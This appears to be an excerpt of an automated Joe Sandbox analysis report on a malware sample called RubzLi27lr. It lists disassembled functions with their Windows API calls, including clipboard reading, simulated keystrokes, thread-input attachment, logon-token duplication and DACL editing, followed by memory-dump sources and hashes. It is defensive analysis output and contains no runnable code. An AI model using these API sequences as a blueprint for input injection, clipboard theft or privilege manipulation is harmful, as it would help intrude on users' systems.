                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoParametersSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3098949447-0
                                                                                                                  • Opcode ID: ccd7ea085d49c45eb282b6168e1b6ba6fefb7832d144ec45cf6faae3df9ed0e4
                                                                                                                  • Instruction ID: cb58587ed4572f3ef1492786307c7c87c1b03780e64fdccf1dae23915a1a345f
                                                                                                                  • Opcode Fuzzy Hash: ccd7ea085d49c45eb282b6168e1b6ba6fefb7832d144ec45cf6faae3df9ed0e4
                                                                                                                  • Instruction Fuzzy Hash: D1C04C35281204AAE2144784BC4BF547754A358B00F044401F609565F38AA15410D754
                                                                                                                  Function 0180DD54 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 0180DD69
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                  • Instruction ID: 92b811a4d98eacf2de27c2db18fc5a9892c5200bdf575d14c221188aa96dab39
                                                                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                  • Instruction Fuzzy Hash: BBE0BF7494010EEFDB01DFE4D9496DD7BB4EF04301F1046A1FD05D7680DB309E549A62
                                                                                                                  Function 0180DD58 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 0180DD69
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                  • Instruction ID: ea500c00999295fd3b0f08f75dda9975fc2a6f5f0332152f35aae67e93d6ed5f
                                                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                  • Instruction Fuzzy Hash: FBE0E67494010EDFDB00DFF4D94969D7BB4EF04301F104261FD01D2280D6309E509A62

                                                                                                                  Non-executed Functions

                                                                                                                  Function 00B49576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B4961A
                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B4965B
                                                                                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B4969F
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B496C9
                                                                                                                  • SendMessageW.USER32 ref: 00B496F2
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00B4978B
                                                                                                                  • GetKeyState.USER32(00000009), ref: 00B49798
                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B497AE
                                                                                                                  • GetKeyState.USER32(00000010), ref: 00B497B8
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B497E9
                                                                                                                  • SendMessageW.USER32 ref: 00B49810
                                                                                                                  • SendMessageW.USER32(?,00001030,?,00B47E95), ref: 00B49918
                                                                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B4992E
                                                                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B49941
                                                                                                                  • SetCapture.USER32(?), ref: 00B4994A
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00B499AF
                                                                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B499BC
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B499D6
                                                                                                                  • ReleaseCapture.USER32 ref: 00B499E1
                                                                                                                  • GetCursorPos.USER32(?), ref: 00B49A19
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00B49A26
                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B49A80
                                                                                                                  • SendMessageW.USER32 ref: 00B49AAE
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B49AEB
                                                                                                                  • SendMessageW.USER32 ref: 00B49B1A
                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B49B3B
                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B49B4A
                                                                                                                  • GetCursorPos.USER32(?), ref: 00B49B68
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00B49B75
                                                                                                                  • GetParent.USER32(?), ref: 00B49B93
                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B49BFA
                                                                                                                  • SendMessageW.USER32 ref: 00B49C2B
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00B49C84
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B49CB4
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B49CDE
                                                                                                                  • SendMessageW.USER32 ref: 00B49D01
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00B49D4E
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B49D82
                                                                                                                    • Part of subcall function 00AC9944: GetWindowLongW.USER32(?,000000EB), ref: 00AC9952
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B49E05
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                  • API String ID: 3429851547-4164748364
                                                                                                                  • Opcode ID: 8eaa10da414a7e9ad34156b2c5feccbbb6a02362152780b2b410c41502f04ebf
                                                                                                                  • Instruction ID: 2716c9e9ec9edbc233cd5fc3cab7115feadc5f85cf02154eccbb3e96993d4e67
                                                                                                                  • Opcode Fuzzy Hash: 8eaa10da414a7e9ad34156b2c5feccbbb6a02362152780b2b410c41502f04ebf
                                                                                                                  • Instruction Fuzzy Hash: 2E429F34205201AFD720CF28CC85EABBBE9FF49710F114A99F599872A1DB31EA51EF51
                                                                                                                  Function 00B44873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00B448F3
                                                                                                                  • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00B44908
                                                                                                                  • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00B44927
                                                                                                                  • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00B4494B
                                                                                                                  • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00B4495C
                                                                                                                  • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00B4497B
                                                                                                                  • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00B449AE
                                                                                                                  • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00B449D4
                                                                                                                  • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00B44A0F
                                                                                                                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00B44A56
                                                                                                                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00B44A7E
                                                                                                                  • IsMenu.USER32(?), ref: 00B44A97
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B44AF2
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B44B20
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B44B94
                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00B44BE3
                                                                                                                  • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00B44C82
                                                                                                                  • wsprintfW.USER32 ref: 00B44CAE
                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B44CC9
                                                                                                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00B44CF1
                                                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B44D13
                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B44D33
                                                                                                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00B44D5A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                  • API String ID: 4054740463-328681919
                                                                                                                  • Opcode ID: d504520ae695d17a6705edd4c7ffe8259451fc61d9939c84e2a4b015592057dd
                                                                                                                  • Instruction ID: 36c4f169d1fd923dac272b87d63bfa0972d7107dadc3c70f190c4241ac578604
                                                                                                                  • Opcode Fuzzy Hash: d504520ae695d17a6705edd4c7ffe8259451fc61d9939c84e2a4b015592057dd
                                                                                                                  • Instruction Fuzzy Hash: 4A12E171600214ABEB248F28CC49FAE7BF8FF45710F1041A9F91ADB2E1DB749A51DB50
                                                                                                                  Function 00ACF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00ACF998
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B0F474
                                                                                                                  • IsIconic.USER32(00000000), ref: 00B0F47D
                                                                                                                  • ShowWindow.USER32(00000000,00000009), ref: 00B0F48A
                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00B0F494
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B0F4AA
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00B0F4B1
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B0F4BD
                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B0F4CE
                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B0F4D6
                                                                                                                  • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00B0F4DE
                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00B0F4E1
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0F4F6
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00B0F501
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0F50B
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00B0F510
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0F519
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00B0F51E
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0F528
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00B0F52D
                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00B0F530
                                                                                                                  • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00B0F557
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                  • Opcode ID: 86f2f9c48427f96e700b8825aef658e0956f407d779115f3f96400aa5b63c458
                                                                                                                  • Instruction ID: 4381287393d176e1bbb00e9c29b1f9a5d590f93d83ad5fa5dc2c2f0818fe6d24
                                                                                                                  • Opcode Fuzzy Hash: 86f2f9c48427f96e700b8825aef658e0956f407d779115f3f96400aa5b63c458
                                                                                                                  • Instruction Fuzzy Hash: 32314D75B41218BBEB206BA55C4AFBF7EACFB45F50F110065FA00E71D1CBB06E00AA60
                                                                                                                  Function 00B11201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B1170D
                                                                                                                    • Part of subcall function 00B116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B1173A
                                                                                                                    • Part of subcall function 00B116C3: GetLastError.KERNEL32 ref: 00B1174A
                                                                                                                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B11286
                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B112A8
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00B112B9
                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B112D1
                                                                                                                  • GetProcessWindowStation.USER32 ref: 00B112EA
                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00B112F4
                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B11310
                                                                                                                    • Part of subcall function 00B110BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B111FC), ref: 00B110D4
                                                                                                                    • Part of subcall function 00B110BF: CloseHandle.KERNEL32(?,?,00B111FC), ref: 00B110E9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                  • String ID: $default$winsta0
                                                                                                                  • API String ID: 22674027-1027155976
                                                                                                                  • Opcode ID: 01029a1ca0b97d26aed0ce5e48b9580f1d0a79d052f26884ec8a5a8a41e8c8c5
                                                                                                                  • Instruction ID: 2392ef1c2a83793056afd7f9d465c7134cd9cdc2300ce84cc3db97038216a2ae
                                                                                                                  • Opcode Fuzzy Hash: 01029a1ca0b97d26aed0ce5e48b9580f1d0a79d052f26884ec8a5a8a41e8c8c5
                                                                                                                  • Instruction Fuzzy Hash: 19818071900209AFDF109FA8DC49BEE7BB9FF05B04F144569FA11B6260D7718A84CF61
                                                                                                                  Function 00B10B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B11114
                                                                                                                    • Part of subcall function 00B110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B11120
                                                                                                                    • Part of subcall function 00B110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B1112F
                                                                                                                    • Part of subcall function 00B110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B11136
                                                                                                                    • Part of subcall function 00B110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B1114D
                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B10BCC
                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B10C00
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00B10C17
                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00B10C51
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B10C6D
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00B10C84
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B10C8C
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00B10C93
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B10CB4
                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00B10CBB
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B10CEA
                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B10D0C
                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B10D1E
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B10D45
                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B10D4C
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B10D55
                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B10D5C
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B10D65
                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B10D6C
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B10D78
                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B10D7F
                                                                                                                    • Part of subcall function 00B11193: GetProcessHeap.KERNEL32(00000008,00B10BB1,?,00000000,?,00B10BB1,?), ref: 00B111A1
                                                                                                                    • Part of subcall function 00B11193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B10BB1,?), ref: 00B111A8
                                                                                                                    • Part of subcall function 00B11193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B10BB1,?), ref: 00B111B7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4175595110-0
                                                                                                                  • Opcode ID: 7468d77fb563ebd573150d122f8e12cb250749da67207789fec75acb0ebc08f8
                                                                                                                  • Instruction ID: 21f06afb69de3fac7a3297979e1628572c4deac2af14d12a45e46b6b6852a3f5
                                                                                                                  • Opcode Fuzzy Hash: 7468d77fb563ebd573150d122f8e12cb250749da67207789fec75acb0ebc08f8
                                                                                                                  • Instruction Fuzzy Hash: 1671A07590120AABDF10EFE4DC44FEEBBB8FF05700F5445A5E914A7250DBB1AA85CB60
                                                                                                                  Function 00B2EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • OpenClipboard.USER32(00B4CC08), ref: 00B2EB29
                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B2EB37
                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00B2EB43
                                                                                                                  • CloseClipboard.USER32 ref: 00B2EB4F
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00B2EB87
                                                                                                                  • CloseClipboard.USER32 ref: 00B2EB91
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00B2EBBC
                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00B2EBC9
                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00B2EBD1
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00B2EBE2
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00B2EC22
                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 00B2EC38
                                                                                                                  • GetClipboardData.USER32(0000000F), ref: 00B2EC44
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00B2EC55
                                                                                                                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B2EC77
                                                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B2EC94
                                                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B2ECD2
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00B2ECF3
                                                                                                                  • CountClipboardFormats.USER32 ref: 00B2ED14
                                                                                                                  • CloseClipboard.USER32 ref: 00B2ED59
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 420908878-0
                                                                                                                  • Opcode ID: 9aff82257d2e85a394fb2c9b5096ea2ba9f7f434bcfcf07fe36d82f533cf4a17
                                                                                                                  • Instruction ID: 377a5c8a726fa037bcc5c677fcb00e0fe626b0c64e16594a57c6eb514b2d8b52
                                                                                                                  • Opcode Fuzzy Hash: 9aff82257d2e85a394fb2c9b5096ea2ba9f7f434bcfcf07fe36d82f533cf4a17
                                                                                                                  • Instruction Fuzzy Hash: E961E034204201AFD300EF65E888F6A7BE8FF85B54F144599F46A872A2CF71DE05CB62
                                                                                                                  Function 00B2698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00B269BE
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B26A12
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B26A4E
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B26A75
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B26AB2
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B26ADF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                  • API String ID: 3830820486-3289030164
                                                                                                                  • Opcode ID: 6e9edbf3defe77411e5aca9d2ed26f7a060358a6edb448c6a0cb602b86888123
                                                                                                                  • Instruction ID: 978141ff811e0e191b89476b901800e67bab5281bf347153da87c73e876cf6de
                                                                                                                  • Opcode Fuzzy Hash: 6e9edbf3defe77411e5aca9d2ed26f7a060358a6edb448c6a0cb602b86888123
                                                                                                                  • Instruction Fuzzy Hash: 8CD16172508340AFC310EBA4D982EAFB7ECAF89704F04495DF589D7192EB75DA44CB62
